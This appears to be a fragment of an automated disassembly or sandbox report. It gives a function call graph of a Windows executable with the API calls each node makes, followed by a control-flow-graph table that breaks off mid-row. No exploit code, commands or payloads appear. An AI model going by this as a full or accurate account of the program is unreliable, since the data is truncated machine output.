95068->95159 95069->94154 95072 e4e8f6 95071->95072 95073 eb5162 95071->95073 95074 e4ed52 95072->95074 95134 e4e906 Mailbox 95072->95134 95247 e8cc5c 86 API calls 4 library calls 95073->95247 95243 e5e3cd 335 API calls 95074->95243 95077 e4ebdd 95077->94187 95079 e4ed63 95079->95077 95081 e4ed70 95079->95081 95080 e4e94c PeekMessageW 95080->95134 95245 e5e312 335 API calls Mailbox 95081->95245 95083 eb526e Sleep 95083->95134 95084 e4ed77 LockWindowUpdate DestroyWindow GetMessageW 95084->95077 95085 e4eda9 95084->95085 95088 eb59ef TranslateMessage DispatchMessageW GetMessageW 95085->95088 95086 e4ebc7 95086->95077 95244 e42ff6 16 API calls 95086->95244 95088->95088 95092 eb5a1f 95088->95092 95090 e4ed21 PeekMessageW 95090->95134 95091 e41caa 49 API calls 95091->95134 95092->95077 95093 e4ebf7 timeGetTime 95093->95134 95095 e5f4ea 48 API calls 95095->95134 95096 e46eed 48 API calls 95096->95134 95097 e4ed3a TranslateMessage DispatchMessageW 95097->95090 95098 eb5557 WaitForSingleObject 95102 eb5574 GetExitCodeProcess CloseHandle 95098->95102 95098->95134 95099 e4d7f7 48 API calls 95129 eb5429 Mailbox 95099->95129 95100 e42aae 311 API calls 95100->95134 95101 eb588f Sleep 95101->95129 95102->95134 95103 e4edae timeGetTime 95246 e41caa 49 API calls 95103->95246 95104 e4edf4 95104->94187 95105 e5dc38 timeGetTime 95105->95129 95108 eb5733 Sleep 95108->95129 95111 eb5926 GetExitCodeProcess 95113 eb593c WaitForSingleObject 95111->95113 95114 eb5952 CloseHandle 95111->95114 95112 eb5445 Sleep 95112->95134 95113->95114 95113->95134 95114->95129 95115 eb5432 Sleep 95115->95112 95116 ea8c4b 108 API calls 95116->95129 95117 e42c79 107 API calls 95117->95129 95119 eb59ae Sleep 95119->95134 95122 e4ce19 48 API calls 95122->95129 95124 e4d6e9 55 API calls 95124->95129 95125 e4fe30 311 API calls 95125->95134 95127 e545e0 311 API calls 95127->95134 95128 e53200 311 API calls 95128->95134 95129->95099 95129->95105 95129->95111 95129->95112 95129->95115 95129->95116 95129->95117 95129->95119 95129->95122 95129->95124 95129->95134 95249 e84cbe 49 API calls Mailbox 95129->95249 95250 e41caa 49 API calls 95129->95250 95251 e42aae 335 API calls 95129->95251 95253 e9ccb2 50 API calls 95129->95253 95254 e87a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95129->95254 95255 e86532 63 API calls 3 library calls 95129->95255 95132 e4ce19 48 API calls 95132->95134 95133 e4d6e9 55 API calls 95133->95134 95134->95080 95134->95083 95134->95086 95134->95090 95134->95091 95134->95093 95134->95095 95134->95096 95134->95097 95134->95098 95134->95100 95134->95101 95134->95103 95134->95104 95134->95108 95134->95112 95134->95125 95134->95127 95134->95128 95134->95129 95134->95132 95134->95133 95160 e4ef00 95134->95160 95167 e4f110 95134->95167 95232 e5e244 95134->95232 95237 e5dc5f 95134->95237 95242 e4eed0 335 API calls Mailbox 95134->95242 95248 ea8d23 48 API calls 95134->95248 95252 e8cc5c 86 API calls 4 library calls 95134->95252 95135->94137 95136->94189 95137->94187 95138->94187 95139->94187 95140->94198 95141->94137 95142->94189 95143->94179 95144->94179 95145->94138 95146->94189 95147->94162 95148->94189 95149->94189 95150->94189 95151->94187 95152->94187 95153->94187 95154->94187 95155->94189 95156->94183 95157->94193 95158->94189 95159->95069 95161 e4ef1d 95160->95161 95162 e4ef2f 95160->95162 95256 e4e3b0 335 API calls 2 library calls 95161->95256 95257 e8cc5c 86 API calls 4 library calls 95162->95257 95165 e4ef26 95165->95134 95166 eb86f9 95166->95166 95168 e4f130 95167->95168 95171 e4fe30 335 API calls 95168->95171 95174 e4f199 95168->95174 95169 e4f3dd 95173 eb87c8 95169->95173 95184 e4f3f2 95169->95184 95215 e4f431 Mailbox 95169->95215 95170 e4f595 95178 e4d7f7 48 API calls 95170->95178 95170->95215 95172 eb8728 95171->95172 95172->95174 95259 e8cc5c 86 API calls 4 library calls 95172->95259 95262 e8cc5c 86 API calls 4 library calls 95173->95262 95174->95169 95174->95170 95180 e4d7f7 48 API calls 95174->95180 95213 e4f229 95174->95213 95175 e4fe30 335 API calls 95175->95215 95179 eb87a3 95178->95179 95261 e60f0a 52 API calls __cinit 95179->95261 95182 eb8772 95180->95182 95181 eb8b1b 95197 eb8bcf 95181->95197 95198 eb8b2c 95181->95198 95260 e60f0a 52 API calls __cinit 95182->95260 95194 e4f418 95184->95194 95263 e89af1 48 API calls 95184->95263 95185 e4f770 95191 eb8a45 95185->95191 95209 e4f77a 95185->95209 95187 e4d6e9 55 API calls 95187->95215 95189 e4fe30 335 API calls 95211 e4f6aa 95189->95211 95190 e8cc5c 86 API calls 95190->95215 95269 e5c1af 48 API calls 95191->95269 95192 eb8b7e 95272 e9e40a 335 API calls Mailbox 95192->95272 95193 eb8c53 95277 e8cc5c 86 API calls 4 library calls 95193->95277 95194->95181 95194->95211 95194->95215 95195 eb8810 95264 e9eef8 335 API calls 95195->95264 95274 e8cc5c 86 API calls 4 library calls 95197->95274 95271 e9f5ee 335 API calls 95198->95271 95199 eb8beb 95275 e9bdbd 335 API calls Mailbox 95199->95275 95205 e51b90 48 API calls 95205->95215 95206 e51b90 48 API calls 95206->95215 95209->95205 95210 eb8c00 95231 e4f537 Mailbox 95210->95231 95276 e8cc5c 86 API calls 4 library calls 95210->95276 95211->95185 95211->95189 95212 e4fce0 95211->95212 95211->95215 95211->95231 95212->95231 95273 e8cc5c 86 API calls 4 library calls 95212->95273 95213->95169 95213->95170 95213->95194 95213->95215 95214 eb8823 95214->95194 95217 eb884b 95214->95217 95215->95175 95215->95187 95215->95190 95215->95192 95215->95193 95215->95199 95215->95206 95215->95212 95215->95231 95258 e4dd47 48 API calls ___crtGetEnvironmentStringsW 95215->95258 95270 e797ed InterlockedDecrement 95215->95270 95278 e5c1af 48 API calls 95215->95278 95265 e9ccdc 48 API calls 95217->95265 95221 eb8857 95223 eb8865 95221->95223 95224 eb88aa 95221->95224 95266 e89b72 48 API calls 95223->95266 95227 eb88a0 Mailbox 95224->95227 95267 e8a69d 48 API calls 95224->95267 95225 e4fe30 335 API calls 95225->95231 95227->95225 95229 eb88e7 95268 e4bc74 48 API calls 95229->95268 95231->95134 95234 ebdf42 95232->95234 95236 e5e253 95232->95236 95233 ebdf77 95234->95233 95235 ebdf59 TranslateAcceleratorW 95234->95235 95235->95236 95236->95134 95238 e5dca3 95237->95238 95240 e5dc71 95237->95240 95238->95134 95239 e5dc96 IsDialogMessageW 95239->95238 95239->95240 95240->95238 95240->95239 95241 ebdd1d GetClassLongW 95240->95241 95241->95239 95241->95240 95242->95134 95243->95086 95244->95079 95245->95084 95246->95134 95247->95134 95248->95134 95249->95129 95250->95129 95251->95129 95252->95134 95253->95129 95254->95129 95255->95129 95256->95165 95257->95166 95258->95215 95259->95174 95260->95213 95261->95215 95262->95231 95263->95195 95264->95214 95265->95221 95266->95227 95267->95229 95268->95227 95269->95215 95270->95215 95271->95215 95272->95212 95273->95231 95274->95231 95275->95210 95276->95231 95277->95231 95278->95215 95279 bc37b0 95293 bc1400 95279->95293 95281 bc3887 95296 bc36a0 95281->95296 95295 bc1a8b 95293->95295 95299 bc48b0 GetPEB 95293->95299 95295->95281 95297 bc36a9 Sleep 95296->95297 95298 bc36b7 95297->95298 95299->95295 95300 eb9c06 95311 e5d3be 95300->95311 95302 eb9c1c 95310 eb9c91 Mailbox 95302->95310 95320 e41caa 49 API calls 95302->95320 95304 e53200 335 API calls 95306 eb9cc5 95304->95306 95308 eba7ab Mailbox 95306->95308 95322 e8cc5c 86 API calls 4 library calls 95306->95322 95307 eb9c71 95307->95306 95321 e8b171 48 API calls 95307->95321 95310->95304 95312 e5d3dc 95311->95312 95313 e5d3ca 95311->95313 95315 e5d3e2 95312->95315 95316 e5d40b 95312->95316 95323 e4dcae 50 API calls Mailbox 95313->95323 95317 e5f4ea 48 API calls 95315->95317 95324 e4dcae 50 API calls Mailbox 95316->95324 95319 e5d3d4 95317->95319 95319->95302 95320->95307 95321->95310 95322->95308 95323->95319 95324->95319 95325 eb197b 95330 e5dd94 95325->95330 95329 eb198a 95331 e5f4ea 48 API calls 95330->95331 95332 e5dd9c 95331->95332 95333 e5ddb0 95332->95333 95338 e5df3d 95332->95338 95337 e60f0a 52 API calls __cinit 95333->95337 95337->95329 95339 e5df46 95338->95339 95341 e5dda8 95338->95341 95370 e60f0a 52 API calls __cinit 95339->95370 95342 e5ddc0 95341->95342 95343 e4d7f7 48 API calls 95342->95343 95344 e5ddd7 GetVersionExW 95343->95344 95345 e46a63 48 API calls 95344->95345 95346 e5de1a 95345->95346 95371 e5dfb4 95346->95371 95351 eb24c8 95353 e5dea4 GetCurrentProcess 95388 e5df5f LoadLibraryA GetProcAddress 95353->95388 95354 e5debb 95355 e5df31 GetSystemInfo 95354->95355 95356 e5dee3 95354->95356 95359 e5df0e 95355->95359 95382 e5e00c 95356->95382 95362 e5df21 95359->95362 95363 e5df1c FreeLibrary 95359->95363 95362->95333 95363->95362 95364 e5df29 GetSystemInfo 95366 e5df03 95364->95366 95365 e5def9 95385 e5dff4 95365->95385 95366->95359 95369 e5df09 FreeLibrary 95366->95369 95369->95359 95370->95341 95372 e5dfbd 95371->95372 95373 e4b18b 48 API calls 95372->95373 95374 e5de22 95373->95374 95375 e46571 95374->95375 95376 e4657f 95375->95376 95377 e4b18b 48 API calls 95376->95377 95378 e4658f 95377->95378 95378->95351 95379 e5df77 95378->95379 95389 e5df89 95379->95389 95393 e5e01e 95382->95393 95386 e5e00c 2 API calls 95385->95386 95387 e5df01 GetNativeSystemInfo 95386->95387 95387->95366 95388->95354 95390 e5dea0 95389->95390 95391 e5df92 LoadLibraryA 95389->95391 95390->95353 95390->95354 95391->95390 95392 e5dfa3 GetProcAddress 95391->95392 95392->95390 95394 e5def1 95393->95394 95395 e5e027 LoadLibraryA 95393->95395 95394->95364 95394->95365 95395->95394 95396 e5e038 GetProcAddress 95395->95396 95396->95394 95397 eb19ba 95402 e5c75a 95397->95402 95401 eb19c9 95403 e4d7f7 48 API calls 95402->95403 95404 e5c7c8 95403->95404 95410 e5d26c 95404->95410 95406 e5c865 95407 e5c881 95406->95407 95413 e5d1fa 48 API calls ___crtGetEnvironmentStringsW 95406->95413 95409 e60f0a 52 API calls __cinit 95407->95409 95409->95401 95414 e5d298 95410->95414 95413->95406 95415 e5d28b 95414->95415 95416 e5d2a5 95414->95416 95415->95406 95416->95415 95417 e5d2ac RegOpenKeyExW 95416->95417 95417->95415 95418 e5d2c6 RegQueryValueExW 95417->95418 95419 e5d2e7 95418->95419 95420 e5d2fc RegCloseKey 95418->95420 95419->95420 95420->95415 95421 eb8eb8 95425 e8a635 95421->95425 95423 eb8ec3 95424 e8a635 84 API calls 95423->95424 95424->95423 95430 e8a642 95425->95430 95435 e8a66f 95425->95435 95426 e8a671 95437 e5ec4e 81 API calls 95426->95437 95427 e8a676 95429 e4936c 81 API calls 95427->95429 95431 e8a67d 95429->95431 95430->95426 95430->95427 95433 e8a669 95430->95433 95430->95435 95432 e4510d 48 API calls 95431->95432 95432->95435 95436 e54525 61 API calls ___crtGetEnvironmentStringsW 95433->95436 95435->95423 95436->95435 95437->95427 95438 e4f030 95439 e53b70 335 API calls 95438->95439 95440 e4f03c 95439->95440 95441 e4b7b1 95450 e4c62c 95441->95450 95443 e4b7c2 95444 e4b7ec 95443->95444 95458 e4bc74 48 API calls 95443->95458 95460 e4ba85 48 API calls ___crtGetEnvironmentStringsW 95444->95460 95447 e4b7e0 95459 e4ba85 48 API calls ___crtGetEnvironmentStringsW 95447->95459 95449 e4b6b7 Mailbox 95461 e4bcce 95450->95461 95452 e4c63b 95453 eb39fd 95452->95453 95456 e4c799 48 API calls 95452->95456 95457 e4c68b 95452->95457 95467 e826bc 88 API calls 4 library calls 95453->95467 95455 eb3a0b 95456->95452 95457->95443 95458->95447 95459->95444 95460->95449 95462 e4bce8 95461->95462 95466 e4bcdb 95461->95466 95463 e5f4ea 48 API calls 95462->95463 95464 e4bcf2 95463->95464 95465 e5ee75 48 API calls 95464->95465 95465->95466 95466->95452 95467->95455 95468 eb19dd 95473 e44a30 95468->95473 95470 eb19f1 95493 e60f0a 52 API calls __cinit 95470->95493 95472 eb19fb 95474 e44a40 __ftell_nolock 95473->95474 95475 e4d7f7 48 API calls 95474->95475 95476 e44af6 95475->95476 95494 e45374 95476->95494 95478 e44aff 95501 e4363c 95478->95501 95481 e4518c 48 API calls 95482 e44b18 95481->95482 95507 e464cf 95482->95507 95485 e4d7f7 48 API calls 95486 e44b32 95485->95486 95513 e449fb 95486->95513 95488 e44b43 Mailbox 95488->95470 95489 e461a6 48 API calls 95492 e44b3d _wcscat Mailbox __wsetenvp 95489->95492 95490 e4ce19 48 API calls 95490->95492 95491 e464cf 48 API calls 95491->95492 95492->95488 95492->95489 95492->95490 95492->95491 95493->95472 95527 e6f8a0 95494->95527 95497 e4ce19 48 API calls 95498 e453a7 95497->95498 95529 e4660f 95498->95529 95500 e453b1 Mailbox 95500->95478 95502 e43649 __ftell_nolock 95501->95502 95536 e4366c GetFullPathNameW 95502->95536 95504 e4365a 95505 e46a63 48 API calls 95504->95505 95506 e43669 95505->95506 95506->95481 95508 e4651b 95507->95508 95512 e464dd ___crtGetEnvironmentStringsW 95507->95512 95510 e5f4ea 48 API calls 95508->95510 95509 e5f4ea 48 API calls 95511 e44b29 95509->95511 95510->95512 95511->95485 95512->95509 95514 e4bcce 48 API calls 95513->95514 95515 e44a0a RegOpenKeyExW 95514->95515 95516 eb41cc RegQueryValueExW 95515->95516 95517 e44a2b 95515->95517 95518 eb4246 RegCloseKey 95516->95518 95519 eb41e5 95516->95519 95517->95492 95520 e5f4ea 48 API calls 95519->95520 95521 eb41fe 95520->95521 95522 e447b7 48 API calls 95521->95522 95523 eb4208 RegQueryValueExW 95522->95523 95524 eb4224 95523->95524 95526 eb423b 95523->95526 95525 e46a63 48 API calls 95524->95525 95525->95526 95526->95518 95528 e45381 GetModuleFileNameW 95527->95528 95528->95497 95530 e6f8a0 __ftell_nolock 95529->95530 95531 e4661c GetFullPathNameW 95530->95531 95532 e46a63 48 API calls 95531->95532 95533 e46643 95532->95533 95534 e46571 48 API calls 95533->95534 95535 e4664f 95534->95535 95535->95500 95537 e4368a 95536->95537 95537->95504 95538 e65dfd 95539 e65e09 _raise 95538->95539 95575 e67eeb GetStartupInfoW 95539->95575 95542 e65e0e 95577 e69ca7 GetProcessHeap 95542->95577 95543 e65e66 95544 e65e71 95543->95544 95662 e65f4d 47 API calls 3 library calls 95543->95662 95578 e67b47 95544->95578 95547 e65e77 95549 e65e82 __RTC_Initialize 95547->95549 95663 e65f4d 47 API calls 3 library calls 95547->95663 95599 e6acb3 95549->95599 95551 e65e91 95552 e65e9d GetCommandLineW 95551->95552 95664 e65f4d 47 API calls 3 library calls 95551->95664 95618 e72e7d GetEnvironmentStringsW 95552->95618 95555 e65e9c 95555->95552 95559 e65ec2 95631 e72cb4 95559->95631 95562 e65ec8 95563 e65ed3 95562->95563 95666 e6115b 47 API calls 3 library calls 95562->95666 95645 e61195 95563->95645 95566 e65edb 95567 e65ee6 __wwincmdln 95566->95567 95667 e6115b 47 API calls 3 library calls 95566->95667 95649 e43a0f 95567->95649 95570 e65efa 95571 e65f09 95570->95571 95668 e613f1 47 API calls _doexit 95570->95668 95669 e61186 47 API calls _doexit 95571->95669 95574 e65f0e _raise 95576 e67f01 95575->95576 95576->95542 95577->95543 95670 e6123a 30 API calls 2 library calls 95578->95670 95580 e67b4c 95671 e67e23 InitializeCriticalSectionAndSpinCount 95580->95671 95582 e67b51 95583 e67b55 95582->95583 95673 e67e6d TlsAlloc 95582->95673 95672 e67bbd 50 API calls 2 library calls 95583->95672 95586 e67b5a 95586->95547 95587 e67b67 95587->95583 95588 e67b72 95587->95588 95674 e66986 95588->95674 95591 e67bb4 95682 e67bbd 50 API calls 2 library calls 95591->95682 95594 e67bb9 95594->95547 95595 e67b93 95595->95591 95596 e67b99 95595->95596 95681 e67a94 47 API calls 4 library calls 95596->95681 95598 e67ba1 GetCurrentThreadId 95598->95547 95600 e6acbf _raise 95599->95600 95601 e67cf4 __lock 47 API calls 95600->95601 95602 e6acc6 95601->95602 95603 e66986 __calloc_crt 47 API calls 95602->95603 95605 e6acd7 95603->95605 95604 e6ad42 GetStartupInfoW 95613 e6ae80 95604->95613 95615 e6ad57 95604->95615 95605->95604 95606 e6ace2 _raise @_EH4_CallFilterFunc@8 95605->95606 95606->95551 95607 e6af44 95691 e6af58 LeaveCriticalSection _doexit 95607->95691 95609 e6aec9 GetStdHandle 95609->95613 95610 e6ada5 95610->95613 95616 e6add7 GetFileType 95610->95616 95617 e6ade5 InitializeCriticalSectionAndSpinCount 95610->95617 95611 e66986 __calloc_crt 47 API calls 95611->95615 95612 e6aedb GetFileType 95612->95613 95613->95607 95613->95609 95613->95612 95614 e6af08 InitializeCriticalSectionAndSpinCount 95613->95614 95614->95613 95615->95610 95615->95611 95615->95613 95616->95610 95616->95617 95617->95610 95619 e65ead 95618->95619 95620 e72e8e 95618->95620 95625 e72a7b GetModuleFileNameW 95619->95625 95692 e669d0 47 API calls std::exception::_Copy_str 95620->95692 95623 e72eb4 ___crtGetEnvironmentStringsW 95624 e72eca FreeEnvironmentStringsW 95623->95624 95624->95619 95626 e72aaf _wparse_cmdline 95625->95626 95627 e65eb7 95626->95627 95628 e72ae9 95626->95628 95627->95559 95665 e6115b 47 API calls 3 library calls 95627->95665 95693 e669d0 47 API calls std::exception::_Copy_str 95628->95693 95630 e72aef _wparse_cmdline 95630->95627 95632 e72ccd __wsetenvp 95631->95632 95636 e72cc5 95631->95636 95633 e66986 __calloc_crt 47 API calls 95632->95633 95641 e72cf6 __wsetenvp 95633->95641 95634 e72d4d 95635 e61c9d _free 47 API calls 95634->95635 95635->95636 95636->95562 95637 e66986 __calloc_crt 47 API calls 95637->95641 95638 e72d72 95639 e61c9d _free 47 API calls 95638->95639 95639->95636 95641->95634 95641->95636 95641->95637 95641->95638 95642 e72d89 95641->95642 95694 e72567 47 API calls 2 library calls 95641->95694 95695 e66e20 IsProcessorFeaturePresent 95642->95695 95644 e72d95 95644->95562 95646 e611a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95645->95646 95648 e611e0 __IsNonwritableInCurrentImage 95646->95648 95710 e60f0a 52 API calls __cinit 95646->95710 95648->95566 95650 eb1ebf 95649->95650 95651 e43a29 95649->95651 95652 e43a63 IsThemeActive 95651->95652 95711 e61405 95652->95711 95656 e43a8f 95723 e43adb SystemParametersInfoW SystemParametersInfoW 95656->95723 95658 e43a9b 95724 e43d19 95658->95724 95660 e43aa3 SystemParametersInfoW 95661 e43ac8 95660->95661 95661->95570 95662->95544 95663->95549 95664->95555 95668->95571 95669->95574 95670->95580 95671->95582 95672->95586 95673->95587 95676 e6698d 95674->95676 95677 e669ca 95676->95677 95678 e669ab Sleep 95676->95678 95683 e730aa 95676->95683 95677->95591 95680 e67ec9 TlsSetValue 95677->95680 95679 e669c2 95678->95679 95679->95676 95679->95677 95680->95595 95681->95598 95682->95594 95684 e730b5 95683->95684 95688 e730d0 __calloc_impl 95683->95688 95685 e730c1 95684->95685 95684->95688 95690 e67c0e 47 API calls __getptd_noexit 95685->95690 95686 e730e0 RtlAllocateHeap 95686->95688 95689 e730c6 95686->95689 95688->95686 95688->95689 95689->95676 95690->95689 95691->95606 95692->95623 95693->95630 95694->95641 95696 e66e2b 95695->95696 95701 e66cb5 95696->95701 95700 e66e46 95700->95644 95702 e66ccf _memset ___raise_securityfailure 95701->95702 95703 e66cef IsDebuggerPresent 95702->95703 95709 e681ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95703->95709 95705 e6a70c __ftell_nolock 6 API calls 95706 e66dd6 95705->95706 95708 e68197 GetCurrentProcess TerminateProcess 95706->95708 95707 e66db3 ___raise_securityfailure 95707->95705 95708->95700 95709->95707 95710->95648 95712 e67cf4 __lock 47 API calls 95711->95712 95713 e61410 95712->95713 95776 e67e58 LeaveCriticalSection 95713->95776 95715 e43a88 95716 e6146d 95715->95716 95717 e61477 95716->95717 95718 e61491 95716->95718 95717->95718 95777 e67c0e 47 API calls __getptd_noexit 95717->95777 95718->95656 95720 e61481 95778 e66e10 8 API calls __wopenfile 95720->95778 95722 e6148c 95722->95656 95723->95658 95725 e43d26 __ftell_nolock 95724->95725 95726 e4d7f7 48 API calls 95725->95726 95727 e43d31 GetCurrentDirectoryW 95726->95727 95779 e461ca 95727->95779 95729 e43d57 IsDebuggerPresent 95730 e43d65 95729->95730 95731 eb1cc1 MessageBoxA 95729->95731 95733 eb1cd9 95730->95733 95734 e43d82 95730->95734 95762 e43e3a 95730->95762 95731->95733 95732 e43e41 SetCurrentDirectoryW 95738 e43e4e Mailbox 95732->95738 95894 e5c682 48 API calls 95733->95894 95853 e440e5 95734->95853 95738->95660 95739 eb1ce9 95743 eb1cff SetCurrentDirectoryW 95739->95743 95743->95738 95762->95732 95776->95715 95777->95720 95778->95722 95896 e5e99b 95779->95896 95783 e461eb 95784 e45374 50 API calls 95783->95784 95785 e461ff 95784->95785 95786 e4ce19 48 API calls 95785->95786 95787 e4620c 95786->95787 95913 e439db 95787->95913 95789 e46216 Mailbox 95790 e46eed 48 API calls 95789->95790 95791 e4622b 95790->95791 95925 e49048 95791->95925 95794 e4ce19 48 API calls 95795 e46244 95794->95795 95796 e4d6e9 55 API calls 95795->95796 95797 e46254 Mailbox 95796->95797 95798 e4ce19 48 API calls 95797->95798 95799 e4627c 95798->95799 95800 e4d6e9 55 API calls 95799->95800 95801 e4628f Mailbox 95800->95801 95802 e4ce19 48 API calls 95801->95802 95803 e462a0 95802->95803 95804 e4d645 53 API calls 95803->95804 95805 e462b2 Mailbox 95804->95805 95806 e4d7f7 48 API calls 95805->95806 95807 e462c5 95806->95807 95928 e463fc 95807->95928 95811 e462df 95812 eb1c08 95811->95812 95813 e462e9 95811->95813 95814 e463fc 48 API calls 95812->95814 95815 e60fa7 _W_store_winword 59 API calls 95813->95815 95816 eb1c1c 95814->95816 95817 e462f4 95815->95817 95819 e463fc 48 API calls 95816->95819 95817->95816 95818 e462fe 95817->95818 95820 e60fa7 _W_store_winword 59 API calls 95818->95820 95821 eb1c38 95819->95821 95822 e46309 95820->95822 95825 e45374 50 API calls 95821->95825 95822->95821 95823 e46313 95822->95823 95824 e60fa7 _W_store_winword 59 API calls 95823->95824 95826 e4631e 95824->95826 95827 eb1c5d 95825->95827 95828 e4635f 95826->95828 95830 eb1c86 95826->95830 95833 e463fc 48 API calls 95826->95833 95829 e463fc 48 API calls 95827->95829 95828->95830 95831 e4636c 95828->95831 95832 eb1c69 95829->95832 95834 e46eed 48 API calls 95830->95834 95839 e5c050 48 API calls 95831->95839 95835 e46eed 48 API calls 95832->95835 95837 e46342 95833->95837 95838 eb1ca8 95834->95838 95836 eb1c77 95835->95836 95840 e463fc 48 API calls 95836->95840 95841 e46eed 48 API calls 95837->95841 95842 e463fc 48 API calls 95838->95842 95843 e46384 95839->95843 95840->95830 95844 e46350 95841->95844 95845 eb1cb5 95842->95845 95846 e51b90 48 API calls 95843->95846 95847 e463fc 48 API calls 95844->95847 95845->95845 95850 e46394 95846->95850 95847->95828 95848 e51b90 48 API calls 95848->95850 95850->95848 95851 e463fc 48 API calls 95850->95851 95852 e463d6 Mailbox 95850->95852 95944 e46b68 48 API calls 95850->95944 95851->95850 95852->95729 95854 e440f2 __ftell_nolock 95853->95854 95855 eb370e _memset 95854->95855 95856 e4410b 95854->95856 95859 eb372a GetOpenFileNameW 95855->95859 95857 e4660f 49 API calls 95856->95857 95858 e44114 95857->95858 95986 e440a7 95858->95986 95861 eb3779 95859->95861 95862 e46a63 48 API calls 95861->95862 95864 eb378e 95862->95864 95864->95864 95894->95739 95897 e4d7f7 48 API calls 95896->95897 95898 e461db 95897->95898 95899 e46009 95898->95899 95900 e46016 __ftell_nolock 95899->95900 95901 e46a63 48 API calls 95900->95901 95903 e4617c Mailbox 95900->95903 95904 e46048 95901->95904 95903->95783 95912 e4607e Mailbox 95904->95912 95945 e461a6 95904->95945 95905 e4614f 95905->95903 95906 e4ce19 48 API calls 95905->95906 95908 e46170 95906->95908 95907 e4ce19 48 API calls 95907->95912 95909 e464cf 48 API calls 95908->95909 95909->95903 95910 e464cf 48 API calls 95910->95912 95911 e461a6 48 API calls 95911->95912 95912->95903 95912->95905 95912->95907 95912->95910 95912->95911 95914 e441a9 136 API calls 95913->95914 95915 e439fe 95914->95915 95916 e43a06 95915->95916 95948 e8c396 95915->95948 95916->95789 95919 e44252 84 API calls 95921 eb2ff0 95919->95921 95920 e61c9d _free 47 API calls 95922 eb2ffd 95920->95922 95921->95920 95923 e44252 84 API calls 95922->95923 95924 eb3006 95923->95924 95924->95924 95926 e5f4ea 48 API calls 95925->95926 95927 e46237 95926->95927 95927->95794 95929 e46406 95928->95929 95930 e4641f 95928->95930 95931 e46eed 48 API calls 95929->95931 95932 e46a63 48 API calls 95930->95932 95933 e462d1 95931->95933 95932->95933 95934 e60fa7 95933->95934 95935 e60fb3 95934->95935 95936 e61028 95934->95936 95943 e60fd8 95935->95943 95983 e67c0e 47 API calls __getptd_noexit 95935->95983 95985 e6103a 59 API calls 4 library calls 95936->95985 95939 e61035 95939->95811 95940 e60fbf 95984 e66e10 8 API calls __wopenfile 95940->95984 95942 e60fca 95942->95811 95943->95811 95944->95850 95946 e4bdfa 48 API calls 95945->95946 95947 e461b1 95946->95947 95947->95904 95949 e44517 83 API calls 95948->95949 95950 e8c405 95949->95950 95951 e8c56d 94 API calls 95950->95951 95952 e8c417 95951->95952 95953 e444ed 64 API calls 95952->95953 95980 e8c41b 95952->95980 95954 e8c432 95953->95954 95955 e444ed 64 API calls 95954->95955 95956 e8c442 95955->95956 95957 e444ed 64 API calls 95956->95957 95958 e8c45d 95957->95958 95959 e444ed 64 API calls 95958->95959 95960 e8c478 95959->95960 95961 e44517 83 API calls 95960->95961 95962 e8c48f 95961->95962 95963 e6395c std::exception::_Copy_str 47 API calls 95962->95963 95964 e8c496 95963->95964 95965 e6395c std::exception::_Copy_str 47 API calls 95964->95965 95966 e8c4a0 95965->95966 95967 e444ed 64 API calls 95966->95967 95968 e8c4b4 95967->95968 95969 e8bf5a GetSystemTimeAsFileTime 95968->95969 95970 e8c4c7 95969->95970 95971 e8c4dc 95970->95971 95972 e8c4f1 95970->95972 95973 e61c9d _free 47 API calls 95971->95973 95974 e8c556 95972->95974 95975 e8c4f7 95972->95975 95977 e8c4e2 95973->95977 95976 e61c9d _free 47 API calls 95974->95976 95978 e8b965 118 API calls 95975->95978 95976->95980 95981 e61c9d _free 47 API calls 95977->95981 95979 e8c54e 95978->95979 95982 e61c9d _free 47 API calls 95979->95982 95980->95919 95980->95921 95981->95980 95982->95980 95983->95940 95984->95942 95985->95939 95987 e6f8a0 __ftell_nolock 95986->95987 95988 e440b4 GetLongPathNameW 95987->95988 95989 e46a63 48 API calls 95988->95989 95990 e440dc 95989->95990 95991 e449a0 95990->95991 95992 e4d7f7 48 API calls 95991->95992 95993 e449b2 95992->95993

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 643 e6b043-e6b080 call e6f8a0 646 e6b082-e6b084 643->646 647 e6b089-e6b08b 643->647 648 e6b860-e6b86c call e6a70c 646->648 649 e6b0ac-e6b0d9 647->649 650 e6b08d-e6b0a7 call e67bda call e67c0e call e66e10 647->650 651 e6b0e0-e6b0e7 649->651 652 e6b0db-e6b0de 649->652 650->648 656 e6b105 651->656 657 e6b0e9-e6b100 call e67bda call e67c0e call e66e10 651->657 652->651 655 e6b10b-e6b110 652->655 661 e6b112-e6b11c call e6f82f 655->661 662 e6b11f-e6b12d call e73bf2 655->662 656->655 692 e6b851-e6b854 657->692 661->662 673 e6b133-e6b145 662->673 674 e6b44b-e6b45d 662->674 673->674 676 e6b14b-e6b183 call e67a0d GetConsoleMode 673->676 677 e6b463-e6b473 674->677 678 e6b7b8-e6b7d5 WriteFile 674->678 676->674 696 e6b189-e6b18f 676->696 681 e6b55a-e6b55f 677->681 682 e6b479-e6b484 677->682 684 e6b7d7-e6b7df 678->684 685 e6b7e1-e6b7e7 GetLastError 678->685 687 e6b565-e6b56e 681->687 688 e6b663-e6b66e 681->688 690 e6b48a-e6b49a 682->690 691 e6b81b-e6b833 682->691 686 e6b7e9 684->686 685->686 693 e6b7ef-e6b7f1 686->693 687->691 694 e6b574 687->694 688->691 700 e6b674 688->700 697 e6b4a0-e6b4a3 690->697 698 e6b835-e6b838 691->698 699 e6b83e-e6b84e call e67c0e call e67bda 691->699 695 e6b85e-e6b85f 692->695 702 e6b856-e6b85c 693->702 703 e6b7f3-e6b7f5 693->703 704 e6b57e-e6b595 694->704 695->648 705 e6b191-e6b193 696->705 706 e6b199-e6b1bc GetConsoleCP 696->706 707 e6b4a5-e6b4be 697->707 708 e6b4e9-e6b520 WriteFile 697->708 698->699 709 e6b83a-e6b83c 698->709 699->692 710 e6b67e-e6b693 700->710 702->695 703->691 713 e6b7f7-e6b7fc 703->713 714 e6b59b-e6b59e 704->714 705->674 705->706 715 e6b1c2-e6b1ca 706->715 716 e6b440-e6b446 706->716 717 e6b4c0-e6b4ca 707->717 718 e6b4cb-e6b4e7 707->718 708->685 719 e6b526-e6b538 708->719 709->695 711 e6b699-e6b69b 710->711 720 e6b69d-e6b6b3 711->720 721 e6b6d8-e6b719 WideCharToMultiByte 711->721 723 e6b812-e6b819 call e67bed 713->723 724 e6b7fe-e6b810 call e67c0e call e67bda 713->724 725 